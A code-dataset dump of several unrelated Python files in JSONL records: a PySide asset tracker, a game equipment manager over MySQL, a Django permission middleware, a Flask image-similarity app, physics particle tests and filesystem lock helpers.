self.tb.item(r,2).setText(_status)\n #update maya connections\n \n #----------------------------------------------------------------------\n def Browse(self):\n \"\"\"browse image file\"\"\"\n print('browse image file')\n \n #self.tb.selectRow(5)\n rows = []\n for i in self.tb.selectionModel().selectedRows():\n rows.append(i.row())\n print(rows)\n \n #----------------------------------------------------------------------\n def Rename(self):\n \"\"\"rename image file\"\"\"\n print('rename image file')\n \n #----------------------------------------------------------------------\n def CopyTo(self):\n \"\"\"copy image file to...\"\"\"\n print('copy image file to...')\n \n #----------------------------------------------------------------------\n def MoveTo(self):\n \"\"\"move image file to...\"\"\"\n print('move image file to...')\n \n #----------------------------------------------------------------------\n def View(self):\n \"\"\"view image\"\"\"\n print('view image')\n \n #----------------------------------------------------------------------\n def Reveal(self):\n \"\"\"reveal image in explorer\"\"\"\n print('reveal image in explorer')\n\n #----------------------------------------------------------------------\n def Refresh(self):\n \"\"\"refresh file node information\"\"\"\n print('refresh')\n\n #\n #----------------------------------------------------------------------\n def SortA2Z(self):\n \"\"\"sort by A to Z\"\"\"\n print('sort by A to Z')\n \n #----------------------------------------------------------------------\n def SortZ2A(self):\n \"\"\"sort by Z to A\"\"\"\n print('sort by Z to A')\n\n #----------------------------------------------------------------------\n def SortByExtension(self):\n \"\"\"sort by file extension\"\"\"\n print('sort by file extension')\n \n #----------------------------------------------------------------------\n def SortByStatus(self):\n \"\"\"sort by file status\"\"\"\n print('sort by file status')\n\n #\n #----------------------------------------------------------------------\n def HighLightByObj(self):\n \"\"\"highLight image file by selected obj(geometry)\"\"\"\n print('highLight image file by selected obj(geometry)')\n\n #----------------------------------------------------------------------\n def HighLightByMat(self):\n \"\"\"highLight image file by selected material\"\"\"\n print('highLight image file by selected material')\n \n #----------------------------------------------------------------------\n def HighLightByTex(self):\n \"\"\"highLight image file by selected texture(fileNode)\"\"\"\n print('highLight image file by selected texture(fileNode)')\n \n #----------------------------------------------------------------------\n def HighLightByKeyWord(self):\n \"\"\"highLight image file by keyword (user input)\"\"\"\n print('highLight image file by keyword (user input)')\n \n #\n #----------------------------------------------------------------------\n def SelectGeometry(self):\n \"\"\"select relevant geometry\"\"\"\n print('select relevant geometry')\n\n #----------------------------------------------------------------------\n def SelectMaterial(self):\n \"\"\"select relevant material(s)\"\"\"\n print('select relevant material(s)')\n \n\n\n########################################################################\nclass Row(object):\n \"\"\"the row data\"\"\"\n\n #----------------------------------------------------------------------\n def __init__(self, fileName=None):\n \"\"\"Constructor:: Row('c:/textures/bitmap.tga')\"\"\"\n \n fPath, fName = os.path.split(fileName)\n \n self._name = fName\n self._fullPath = fPath\n self._status = \"OK\" if os.path.exists(fileName) else \"Missing\"\n self._type = os.path.splitext(fileName)[-1]\n \n #----------------------------------------------------------------------\n def _getName(self):\n \"\"\"\"\"\"\n return self._name\n #----------------------------------------------------------------------\n def _setName(self, v):\n \"\"\"\"\"\"\n if isinstance(v, str) or isinstance(v, unicode) or isinstance(v, QString):\n self._name = v\n \n Name = property(_getName, _setName)\n \n #----------------------------------------------------------------------\n def _getFullPath(self):\n \"\"\"\"\"\"\n return self._fullPath\n #----------------------------------------------------------------------\n def _setFullPath(self, v):\n \"\"\"\"\"\"\n if os.path.isdir(v):\n self._fullPath = v\n \n FullPath = property(_getFullPath, _setFullPath)\n \n #----------------------------------------------------------------------\n def _getStatus(self):\n \"\"\"\"\"\"\n return self._status\n \n Status = property(_getStatus)\n \n #----------------------------------------------------------------------\n def _getType(self):\n \"\"\"\"\"\"\n return self._type\n \n Type = property(_getType)\n \n #----------------------------------------------------------------------\n def __str__(self):\n \"\"\"\"\"\"\n return u\"name:%s path:%s status:%s type:%s\"%(self.Name, self.FullPath, self.Status, self.Type)\n \n\n\n########################################################################\nclass MyTable(object):\n \"\"\"\n MyRow Collection:: [ [key1, Row1], [key2, Row2] ... ]\n Similar to collections.OrderedDict, but it in Python2.7\n \n \"\"\"\n #----------------------------------------------------------------------\n def __init__(self):\n \"\"\"Constructor\"\"\"\n self._table = []\n self._start = 0\n\n #----------------------------------------------------------------------\n @staticmethod\n def CreateFromFileNames(fileNames=[]):\n \"\"\"Factory Method:: Create a sorted table\"\"\"\n tb = MyTable()\n \n fileNames.sort()\n for f in fileNames:\n tb.Add(f, Row(f))\n #if os.path.isfile(f):\n #tb.Add(f, Row(f))\n \n return tb\n \n #----------------------------------------------------------------------\n def _getTable(self):\n \"\"\"\"\"\"\n return self._table\n \n #----------------------------------------------------------------------\n def _setTable(self, v):\n \"\"\"\"\"\"\n if isinstance(v, list):\n self._table = v\n \n Table = property(_getTable, _setTable)\n \n #----------------------------------------------------------------------\n def _getKeys(self):\n \"\"\"fileName collection\"\"\"\n keys = []\n for item in self.Table:\n keys.append(item[0])\n return keys\n \n Keys = property(_getKeys)\n \n #----------------------------------------------------------------------\n def _getValues(self):\n \"\"\"MyRow collection\"\"\"\n values = []\n for item in self.Table:\n values.append(item[1])\n return values\n \n Values = property(_getValues)\n \n #----------------------------------------------------------------------\n def _getCount(self):\n \"\"\"\"\"\"\n return len(self.Table)\n \n Count = property(_getCount)\n \n #----------------------------------------------------------------------\n def __len__(self):\n \"\"\"\"\"\"\n return self.Count\n \n #----------------------------------------------------------------------\n def Add(self, k, v):\n \"\"\"append [k, v] in the Table collection, k is the UniqueFileName(ex: 'c:/textures/bitmap.tga'), v is a MyRow object\"\"\"\n if isinstance(v, Row):\n self.Table.append([k, v])\n else:\n raise TypeError(\"argument v type mustbe Row\")\n \n #----------------------------------------------------------------------\n def Clear(self):\n \"\"\"\"\"\"\n self.Table = []\n self.Keys = []\n self.Values = []\n \n #----------------------------------------------------------------------\n def Remove(self, k):\n \"\"\"[].pop\"\"\"\n if self.Keys.count(k):\n index = self.Keys.index(k)\n self.Table.pop(index)\n \n #----------------------------------------------------------------------\n def __getitem__(self, k):\n \"\"\"\"\"\"\n if isinstance(k, int):\n #raise KeyError(\"%s\"%k)\n return self[self.Keys[k]]\n if isinstance(k, str) or isinstance(k, unicode) or isinstance(k, QString) and self.Keys.count(k):\n return self.Table[self.Keys.index(k)][-1]\n #----------------------------------------------------------------------\n def __setitem__(self, k, v):\n \"\"\"\"\"\"\n if isinstance(k, str) or isinstance(k, unicode) or isinstance(k, QString) and isinstance(v, Row):\n if self.Keys.count(k):\n index = self.Keys.index(k)\n self.Table[index][-1] = v\n else:\n self.Add(k, v)\n \n #----------------------------------------------------------------------\n def SortByName(self, reverse=False):\n \"\"\"sort by name(A-Z), reverse=True:(Z-A)\"\"\"\n if self.Count > 0:\n self.Table.sort(key=lambda item:item[-1].Name, reverse=reverse)\n \n #----------------------------------------------------------------------\n def SortByType(self, reverse=False):\n \"\"\"\"\"\"\n if self.Count > 0:\n self.Table.sort(key=lambda item:item[-1].Type, reverse=reverse)\n \n #----------------------------------------------------------------------\n def SortByStatus(self, reverse=False):\n \"\"\"\"\"\"\n if self.Count > 0:\n self.Table.sort(key=lambda item:item[-1].Status, reverse=reverse)\n \n #----------------------------------------------------------------------\n def __str__(self):\n \"\"\"\"\"\"\n return unicode([\"\\n['%s': %s]\\n\"%(k,self[k]) for k in self.Keys])\n \n #----------------------------------------------------------------------\n def __iter__(self):\n \"\"\"\"\"\"\n return self\n \n #----------------------------------------------------------------------\n def next(self):\n \"\"\"\"\"\"\n if self._start >= self.Count:\n raise StopIteration\n index = self._start\n self._start += 1\n return self.Table[index]\n \n #----------------------------------------------------------------------\n def Reset(self):\n \"\"\"\"\"\"\n self._start = 0\n \n \n \n#----------------------------------------------------------------------\ndef Main():\n \"\"\"test\"\"\"\n app = QApplication(sys.argv)\n #win = AssetTracking(GetMayaWindow())\n \n win = AssetTracking()\n win.show()\n \n sys.exit(app.exec_())\n \nif __name__ == \"__main__\":\n Main()\n\n","sub_path":"PySideExercise/AssetTracking.py","file_name":"AssetTracking.py","file_ext":"py","file_size_in_byte":25546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"573391696","text":"import numpy as np\nfrom os.path import join\nfrom tensorboardX import SummaryWriter\nfrom matplotlib import pyplot as plt\nfrom io import BytesIO\nfrom PIL import Image\nfrom functools import partial\nfrom functools import wraps\nimport time\n\ndef write_until_success(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n for i in range(30):\n try:\n ret = func(*args, **kwargs)\n break\n except OSError:\n print('%s OSError' % str(args))\n time.sleep(1)\n return ret\n return wrapper\n\nclass Visualizer():\n def __init__(self, opt):\n self.opt = opt\n if opt.isTrain:\n self.name = opt.name\n self.save_dir = join(opt.checkpoints_dir, opt.name, 'log')\n self.writer = SummaryWriter(logdir=join(self.save_dir))\n else:\n self.name = '%s_%s_%d' % (\n opt.name, opt.dataset_name, opt.load_iter)\n self.save_dir = join(opt.checkpoints_dir, opt.name)\n if opt.save_imgs:\n self.writer = SummaryWriter(logdir=join(\n self.save_dir, 'ckpts', self.name))\n\n @write_until_success\n def display_current_results(self, phase, visuals, iters):\n for k, v in visuals.items():\n v = v.cpu()\n self.writer.add_image('%s/%s'%(phase, k), v[0]/255, iters)\n self.writer.flush()\n\n @write_until_success\n def print_current_losses(self, epoch, iters, losses,\n t_comp, t_data, total_iters):\n message = '(epoch: %d, iters: %d, time: %.3f, data: %.3f) ' \\\n % (epoch, iters, t_comp, t_data)\n for k, v in losses.items():\n message += '%s: %.4e ' % (k, v)\n self.writer.add_scalar('loss/%s'%k, v, total_iters)\n print(message)\n \n @write_until_success\n def print_psnr(self, epoch, total_epoch, time_val, mean_psnr):\n self.writer.add_scalar('val/psnr', mean_psnr, epoch)\n print('End of epoch %d / %d (Val) \\t Time Taken: %.3f s \\t PSNR: %f'\n % (epoch, total_epoch, time_val, mean_psnr))\n\n\n","sub_path":"util/visualizer.py","file_name":"visualizer.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"405549930","text":"import json\n\nfrom django.contrib.sites.models import Site\nfrom django.core.serializers.json import DjangoJSONEncoder\n\nfrom ...core.utils import build_absolute_uri\n\n\ndef get_organization():\n site = Site.objects.get_current()\n return {'@type': 'Organization', 'name': site.name}\n\n\ndef get_skill_data(line, organization):\n gross_skill_price = line.get_total().gross\n skill_data = {\n '@type': 'Offer',\n 'itemOffered': {\n '@type': 'Skill',\n 'name': line.translated_skill_name or line.skill_name,\n 'sku': line.skill_sku,\n },\n 'price': gross_skill_price.amount,\n 'priceCurrency': gross_skill_price.currency,\n 'eligibleQuantity': {\n '@type': 'QuantitativeValue',\n 'value': line.quantity\n },\n 'seller': organization}\n\n skill = line.variant.skill\n skill_url = build_absolute_uri(skill.get_absolute_url())\n skill_data['itemOffered']['url'] = skill_url\n\n skill_image = skill.get_first_image()\n if skill_image:\n image = skill_image.image\n skill_data['itemOffered']['image'] = build_absolute_uri(\n location=image.url)\n return skill_data\n\n\ndef get_task_confirmation_markup(task):\n \"\"\"Generates schema.org markup for task confirmation e-mail message.\"\"\"\n organization = get_organization()\n task_url = build_absolute_uri(task.get_absolute_url())\n data = {\n '@context': 'http://schema.org',\n '@type': 'Task',\n 'merchant': organization,\n 'taskNumber': task.pk,\n 'priceCurrency': task.total.gross.currency,\n 'price': task.total.gross.amount,\n 'acceptedOffer': [],\n 'url': task_url,\n 'potentialAction': {\n '@type': 'ViewAction',\n 'url': task_url\n },\n 'taskStatus': 'http://schema.org/TaskProcessing',\n 'taskDate': task.created}\n\n lines = task.lines.prefetch_related('variant')\n for line in lines:\n skill_data = get_skill_data(line=line, organization=organization)\n data['acceptedOffer'].append(skill_data)\n return json.dumps(data, cls=DjangoJSONEncoder)\n","sub_path":"remote_works/seo/schema/email.py","file_name":"email.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"174680671","text":"import user_manager\r\nimport mysql_helper\r\nimport random\r\nfrom equipment import equipmentClass\r\n\r\n\r\ndef randomize_equipment_id():\r\n # print(\"Randomized equipment ran!\")\r\n randomized_number = random.randint(0, 101)\r\n\r\n \"\"\"\r\n * Common: 1 - 50\r\n * Rare: 50 - 80\r\n * Epic: 80 - 95\r\n * Legendary: 95 - 100 \r\n \"\"\"\r\n if randomized_number < 50:\r\n return \"Common\"\r\n elif 49 < randomized_number < 80:\r\n return \"Rare\"\r\n elif 79 < randomized_number < 95:\r\n return \"Epic\"\r\n else:\r\n return \"Legendary\"\r\n\r\n\r\n\"\"\"\r\nAuthor: Felix Wang\r\nPurpose: Returns a randomized Equipment\r\nReturns: If method is successful: Equipment_Obj\r\n If method is unsuccessful: False\r\nParameters: rarity : string (E.g 'Common')\r\n\"\"\"\r\ndef randomize_equipment_by_rarity(rarity):\r\n sql_statement = \"SELECT * FROM myequipment WHERE equipmentRarity = '\" + rarity + \"'\"\r\n equipment_list = mysql_helper.select_statement(sql_statement)\r\n equipment_obj_list = []\r\n\r\n for eq in equipment_list:\r\n print(eq)\r\n equipment_obj = equipmentClass(eq[0], eq[1], eq[2], eq[3], eq[4], eq[5], eq[6], 'N')\r\n equipment_obj_list.append(equipment_obj)\r\n\r\n if len(equipment_obj_list) == 0:\r\n print (\"ERROR: Equipment with '%s' rarity does not exist \" % rarity)\r\n return False\r\n else:\r\n randomized_number = random.randint(0, len(equipment_obj_list) - 1)\r\n print (\"SUCCESS: Returned equipment object with %s rarity.\" % rarity)\r\n return equipment_obj_list[randomized_number]\r\n\r\n\r\ndef get_existing_equipment(User_id):\r\n sql_statement = \"SELECT * FROM myheroinventory hi INNER JOIN myequipment eq \" \\\r\n \"ON hi.equipmentId = eq.equipmentId WHERE hi.userId = '\" + User_id + \"'\"\r\n response = mysql_helper.select_statement(sql_statement)\r\n if not response:\r\n return [1]\r\n equipment_list = response\r\n print(\"%s results returned \" % (str(len(equipment_list))))\r\n\r\n equipment_obj_list = []\r\n try:\r\n for eq in equipment_list:\r\n equipment_obj = equipmentClass(eq[3], eq[4], eq[5], eq[6], eq[7], eq[8], eq[9], eq[2])\r\n equipment_obj_list.append(equipment_obj)\r\n except IndexError:\r\n return []\r\n return [0, equipment_obj_list]\r\n\r\n\r\ndef equip_equipment(userID, equipmentID):\r\n sql_statement = \"UPDATE myheroinventory SET isEquipped = 'Y' WHERE userId = %s AND equipmentId = %s\"\r\n print(userID, equipmentID)\r\n print(sql_statement)\r\n if not mysql_helper.sql_operation(sql_statement, [str(userID), str(equipmentID)]):\r\n return 1\r\n else:\r\n return 0\r\n\r\n\r\ndef unequip_equipment(userID, equipmentID):\r\n sql_statement = \"UPDATE myheroinventory SET isEquipped = 'N' WHERE userId = %s AND equipmentId = %s\"\r\n if not mysql_helper.sql_operation(sql_statement, [str(userID), str(equipmentID)]):\r\n return 1\r\n else:\r\n return 0\r\n\r\n\r\n\"\"\"\r\nAuthor: Felix Wang\r\nPurpose: Adds equipment to the selected user\r\nReturns: Message\r\nParameters: User id : int\r\n\"\"\"\r\n\r\n\r\ndef obtain_equipment(User_id, Equipment_id):\r\n sql_statement = \"SELECT * FROM myheroinventory WHERE userId = '\" + str(User_id) + \"' AND equipmentId = '\" + str(Equipment_id) + \"';\"\r\n\r\n # If equipment already exist. Exit the method\r\n if mysql_helper.check_if_record_exist(sql_statement):\r\n print(\"Item already exist\")\r\n return \"Success\"\r\n\r\n # Save the equipment into the database\r\n sql_statement = \"INSERT INTO myheroinventory (userId, equipmentId, isEquipped) VALUES (%s, %s, %s)\"\r\n data_value = [User_id, Equipment_id, 'N']\r\n response = mysql_helper.sql_operation(sql_statement, data_value)\r\n if not response:\r\n print(response)\r\n return response\r\n print(\"Equipment Obtained Sucesssfully\")\r\n return \"Success\"\r\n\r\n\r\ndef update_total_power(userID):\r\n sql_statement = \"SELECT SUM(e.equipmentPowerLevel) FROM myheroinventory hi INNER JOIN myequipment e \" \\\r\n \"ON hi.equipmentID = e.equipmentID WHERE userId = '\" + str(userID) + \"' AND isEquipped = 'Y'\"\r\n\r\n response = mysql_helper.select_statement(sql_statement)\r\n if not response:\r\n return [1]\r\n print(response[0][0])\r\n if response[0][0] is None:\r\n return [0, 0]\r\n else:\r\n return [0, response[0][0]]\r\n\r\n\r\nif __name__ == '__main__':\r\n # user_obj = user_manager.getUserObj(1)\r\n # user_obj.print_details()\r\n # obtain_equipment(user_obj.Id, '1')\r\n # equipment_obj_list = get_existing_equipment(user_obj.Id)\r\n # for eq in equipment_obj_list:\r\n # eq.print_details()\r\n equipment_obj = randomize_equipment_by_rarity('commoner')\r\n equipment_obj.print_details()\r\n","sub_path":"server/hero_manager.py","file_name":"hero_manager.py","file_ext":"py","file_size_in_byte":4736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"423383161","text":"\"\"\"\r\r\nTest that the graphics card responds to the \r\r\npygame setgamma command\"\"\"\r\r\n\r\r\nfrom psychopy import *\r\r\n\r\r\nmyWin = Window((800.0,800.0),fullscr=1)\r\r\nmyWin.setGamma(1.0)\r\r\n\r\r\ngammaValDisplay = TextStim(myWin,pos=[-0.9,-0.9],rgb=(1.0,1.0,1.0))\r\r\n\r\r\ntrialClock = Clock()\r\r\nt=0.0\r\r\n\r\r\nwhile t<10:\r\r\n t = trialClock.getTime()\r\r\n \r\r\n gammaVal = t/3.0 +1\r\r\n gammaValDisplay.set('text',str(gammaVal))\r\r\n gammaValDisplay.draw()\r\r\n myWin.setGamma(gammaVal)\r\r\n myWin.update()\r\r\n \r\r\nmyWin.close()","sub_path":"sandbox/testGammaTable.pyw","file_name":"testGammaTable.pyw","file_ext":"pyw","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"362001294","text":"sum = 18\r\nnumbers = [3,5,10]\r\n\r\ntempList = [0]*(sum+1)\r\ntempList[0] = 1\r\ntemp = 0\r\nfor i in numbers:\r\n for j in range(i,sum+1):\r\n if j%i==0 or tempList[j-i] >0:\r\n tempList[j]+=1\r\n #print(i,j,tempList)\r\nprint(max(tempList))\r\n","sub_path":"Codes/waysToGetSum.py","file_name":"waysToGetSum.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"322061345","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n####\n# Frank and Raha\n# Elementary module for CW 5\n# PHYS 220\n# 10/1/18\n####\n\nimport elementary\nfrom scipy import constants\nimport math\n\n\"\"\"elementary.py Test Module\n\nVerifies that the implementations for the particle classes are correct.\n\"\"\"\n\ndef test_instantiation():\n \"\"\"Verify that particles are created with correct attributes.\n \"\"\"\n p = elementary.Particle(1.0, 2.0, 3.0)\n assert math.isclose(p.mass, 1.0)\n assert all(math.isclose(*pos) for pos in zip(p.position, (1.0, 2.0, 3.0)) )\n assert all(math.isclose(*mom) for mom in zip(p.momentum, (0.0, 0.0, 0.0)) )\n\ndef test_impulse():\n \"\"\"Verify that an impulse changes the momentum.\n \"\"\"\n p = elementary.Particle(1.0, 2.0, 3.0)\n p.impulse(1.0, 2.0, 3.0)\n assert all(math.isclose(*mom) for mom in zip(p.momentum, (1.0, 2.0, 3.0)) )\n \ndef test_move():\n \"\"\"Verify that motion proceeds as expected.\n \"\"\"\n p = elementary.Particle(1.0, 2.0, 3.0)\n p.mass = 2.0 # Change mass so motion is nontrivial\n p.impulse(1.0, 2.0, 3.0)\n p.move(0.1)\n assert all(math.isclose(*pos) for pos in zip(p.position, (1.0 + 0.1*1.0/2.0, 2.0 + 0.1*2.0/2.0, 3.0 + 0.1*3.0/2.0)) )\n\ndef test_electron():\n \"\"\"Verify the electron implementation.\n \"\"\"\n e = elementary.Electron(1.0, 2.0, 3.0)\n assert math.isclose(e.mass, constants.m_e)\n assert math.isclose(e.charge, -constants.e)\n\ndef test_proton():\n \"\"\"Verify the positron implementation.\n \"\"\"\n p = elementary.Proton(1.0, 2.0, 3.0)\n assert math.isclose(p.mass, constants.m_p)\n assert math.isclose(p.charge, constants.e)\n","sub_path":"test_particles.py","file_name":"test_particles.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"360859163","text":"from django.conf import settings\r\nfrom django.utils.deprecation import MiddlewareMixin\r\nimport re\r\nfrom django.shortcuts import HttpResponse, redirect\r\n\r\n\r\nclass RbacMiddleware(MiddlewareMixin):\r\n \"\"\"\r\n 用户权限信息校验\r\n \"\"\"\r\n\r\n def process_request(self, request):\r\n \"\"\"\r\n 当用户请求刚进入时候出发执行\r\n :param request:\r\n :return:\r\n \"\"\"\r\n\r\n \"\"\"\r\n 1. 获取当前用户请求的URL\r\n 2. 获取当前用户在session中保存的权限列表 ['/customer/list/','/customer/list/(?P\\\\d+)/']\r\n 3. 权限信息匹配\r\n \"\"\"\r\n current_url = request.path_info\r\n for valid_url in settings.VALID_URL_LIST:\r\n if re.match(valid_url, current_url):\r\n # 白名单中的URL无需权限验证即可访问\r\n return None\r\n\r\n permission_list = request.session.get(settings.PERMISSION_SESSION_KEY)\r\n\r\n if not permission_list:\r\n # return redirect('/login/')\r\n return HttpResponse('未获取到用户权限信息,请登录!')\r\n\r\n flag = False\r\n\r\n for url in permission_list:\r\n reg = \"^%s$\" % url\r\n if re.match(reg, current_url):\r\n flag = True\r\n break\r\n\r\n if not flag:\r\n return HttpResponse('无权访问')\r\n","sub_path":"rbac/middlewares/rbac.py","file_name":"rbac.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"531015166","text":"#!/usr/bin/env python\n\n'''\n p5At\n written by George Wilborn\n @01362321\n'''\n\n#import regular expression module\nimport re\n'''\nsetVariable\n will take in the rest of the line and set variables into the dictionary\n atString - string containing tokens\n varDictionary - Dictionary for the variables\n'''\ndef setVariable(atString,varDictionary):\n #split line into tokens with regular expressions\n# print(atString)\n tokens = re.split(\"[\\\"=\\\\n]*\",atString)\n# print(tokens)\n\n #insert var into dictionary\n varDictionary[tokens[0]] = tokens[1]\n\n'''\nsetFormat\n will take in rest of the line and set the format vars into the dictionary\n atString - line pulled from file\n formatDictionary - dictionary for the format vars\n'''\ndef setFormat(atString,formatDictionary):\n #list of specifics to look for later on\n buttons = \"LEFT RIGHT BULLET CENTER\"\n\n #seperate line into tokens\n tokens = re.split(\"[=\\s\\\\n]*\",atString)\n\n #conditional statements\n for i in range(0,(len(tokens)-1),2):\n #all the good stuff insert into dictionary\n if(tokens[i] in formatDictionary):\n if(tokens[i]==\"JUST\"):\n if(re.compile(tokens[i+1]).search(buttons)):\n formatDictionary[tokens[i]] = tokens[i+1]\n #all the bad stuffs (yell at user)\n else:\n print(\"*** Bad value for JUST=, found:\", tokens[i+1])\n else:\n formatDictionary[tokens[i]] = tokens[i+1]\n else:\n print(\"*** Invalid format, found:\", atString)\n","sub_path":"python/p6/p6At.py","file_name":"p6At.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"452846451","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 2018/12/13 14:54\n@author: Sucre\n@email: qian.dong.2018@gmail.com\n\"\"\"\n\n\nclass Solution:\n def maxArea(self, height):\n \"\"\"\n :type height: List[int]\n :rtype: int\n \"\"\"\n r = len(height) - 1\n l = 0\n max_area = 0\n while l < r:\n width = r - l\n h = min(height[r], height[l])\n max_area = max(max_area, width*h)\n if height[l]/')\ndef uploaded_file(filename,filename2):\n\n model=load_model()\n img_f=Image.open(\"uploads/\"+filename)\n img_f=resize_aspect_ratio(img_f,(200,200))\n img_f=padding(img_f,(224,224))\n img_f_in=preprocess_input(np.expand_dims(np.array(img_f),axis=0)) \n query_feature_front = model.predict(img_f_in)[0] \n sim_front=query_feature_front.dot(feature_f.T)\n \n img_b=Image.open(\"uploads/\"+filename2)\n img_b=resize_aspect_ratio(img_b,(200,200))\n img_b=padding(img_b,(224,224))\n img_b_in=preprocess_input(np.expand_dims(np.array(img_b),axis=0))\n query_feature_back=model.predict(img_b_in)[0]\n sim_back=query_feature_back.dot(feature_b.T)\n top20=np.argsort(sim_front+sim_back)[-20:][::-1]\n \n fig=searching_display(top20,[img_f,img_b],[filename,filename2])\n fig.savefig('output/{}.jpg'.format(filename)) \n return send_file(\"output/{}.jpg\".format(filename), mimetype='image/jpg')\n\nif __name__ == '__main__':\n db_list , feature_f , feature_b =load_data_directory()\n #model=load_model()\n app.debug=True\n app.run(host=\"0.0.0.0\",port=int(\"8080\"))\n\n","sub_path":"image_similarity/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"370943959","text":"from rest_framework import serializers\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom drf_yasg.utils import swagger_auto_schema\nfrom drf_yasg import openapi\nimport uuid\nfrom management.mixins import MixinViewSet\nfrom management.utils.csrf import CsrfExemptSessionAuthentication\n\n\nclass TokenSerializer(serializers.Serializer):\n aaa = serializers.CharField(max_length=40, required=True, allow_null=False,\n label='aaa *')\n bbb = serializers.CharField(max_length=40, required=True, allow_null=False,\n label='bbb *')\n\n class Meta:\n fields = '__all__'\n\n\nclass TokenView(MixinViewSet):\n serializer_class = TokenSerializer\n http_method_names = ['post']\n authentication_classes = (CsrfExemptSessionAuthentication,)\n\n @swagger_auto_schema(\n operation_description='Token API',\n tags=['Example Token'],\n request_body=openapi.Schema(\n type=openapi.TYPE_OBJECT,\n required=['aaa', 'bbb'],\n properties={\n 'aaa': openapi.Schema(type=openapi.TYPE_STRING),\n 'bbb': openapi.Schema(type=openapi.TYPE_STRING),\n },\n ),\n responses={\n status.HTTP_200_OK: openapi.Response(\n '{\"token\": \"xxxx\", success\": True}'),\n status.HTTP_500_INTERNAL_SERVER_ERROR: openapi.Response('{\"success\": False, \"message\": \"\"}'),\n },\n )\n def post(self, request, format=None):\n serializer = self.serializer_class(data=request.data)\n reply = {\n 'success': False,\n 'message': \"unknown error\"\n }\n if serializer.is_valid():\n reply = {\"token\": str(uuid.uuid4()), \"success\": True}\n return Response(reply, status=status.HTTP_200_OK)\n if serializer.errors:\n reply['message'] = serializer.errors\n return Response(reply, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n","sub_path":"projectname/exampleapp/apis/v1/token.py","file_name":"token.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"411555616","text":"# Copyright (c) Meta Platforms, Inc. and affiliates.\n#\n# This source code is licensed under the MIT license found in the\n# LICENSE file in the root directory of this source tree.\n\nimport fcntl\nimport logging\nimport os\nfrom contextlib import contextmanager\nfrom pathlib import Path\nfrom typing import Generator, Optional\n\n\nLOG: logging.Logger = logging.getLogger(__name__)\n\n\nclass EnvironmentException(Exception):\n pass\n\n\ndef readable_directory(directory: str) -> str:\n if not os.path.isdir(directory):\n raise EnvironmentException(f\"`{directory}` is not a valid directory.\")\n if not os.access(directory, os.R_OK):\n raise EnvironmentException(f\"`{directory}` is not a readable directory.\")\n return directory\n\n\ndef writable_directory(path: str) -> str:\n # Create the directory if it does not exist.\n try:\n os.makedirs(path)\n except FileExistsError:\n pass\n path = os.path.abspath(path)\n if not os.path.isdir(path):\n raise EnvironmentException(f\"{path} is not a valid directory.\")\n if not os.access(path, os.W_OK):\n raise EnvironmentException(f\"{path} is not a writable directory.\")\n return path\n\n\ndef expand_relative_path(root: str, path: str) -> str:\n expanded_path = Path(path).expanduser()\n if expanded_path.is_absolute():\n return str(expanded_path)\n else:\n return str(Path(root) / expanded_path)\n\n\ndef expand_global_root(path: str, global_root: str) -> str:\n if path.startswith(\"//\"):\n return expand_relative_path(global_root, path[2:])\n return path\n\n\ndef file_or_directory_exists(path: str) -> str:\n if os.path.isdir(path) or os.path.isfile(path):\n return path\n raise ValueError(f\"{path} is not a valid path\")\n\n\ndef _lock_command(blocking: bool, is_shared_reader: bool) -> int:\n lock_command = fcntl.LOCK_SH if is_shared_reader else fcntl.LOCK_EX\n return lock_command if blocking else lock_command | fcntl.LOCK_NB\n\n\n@contextmanager\ndef acquire_lock(\n path: str, blocking: bool, is_shared_reader: bool = False\n) -> Generator[Optional[int], None, None]:\n \"\"\"Raise an OSError if `blocking` is False and the lock can't be acquired.\n\n If `is_shared_reader=True`, then other processes can acquire the same\n lock with `is_shared_reader=True`, but not with `is_shared_reader=False`.\n Conversely, if `is_shared_reader=False`, then no other process can\n acquire the lock until it is released.\"\"\"\n\n LOG.debug(\n \"Trying to acquire %slock on file %s\",\n \"shared reader \" if is_shared_reader else \"\",\n path,\n )\n try:\n with open(path, \"w+\") as lockfile:\n try:\n fcntl.lockf(\n lockfile.fileno(), _lock_command(blocking, is_shared_reader)\n )\n yield lockfile.fileno()\n finally:\n fcntl.lockf(lockfile.fileno(), fcntl.LOCK_UN)\n except FileNotFoundError:\n LOG.debug(f\"Unable to acquire lock because lock file {path} was not found\")\n yield\n","sub_path":"client/filesystem.py","file_name":"filesystem.py","file_ext":"py","file_size_in_byte":3020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
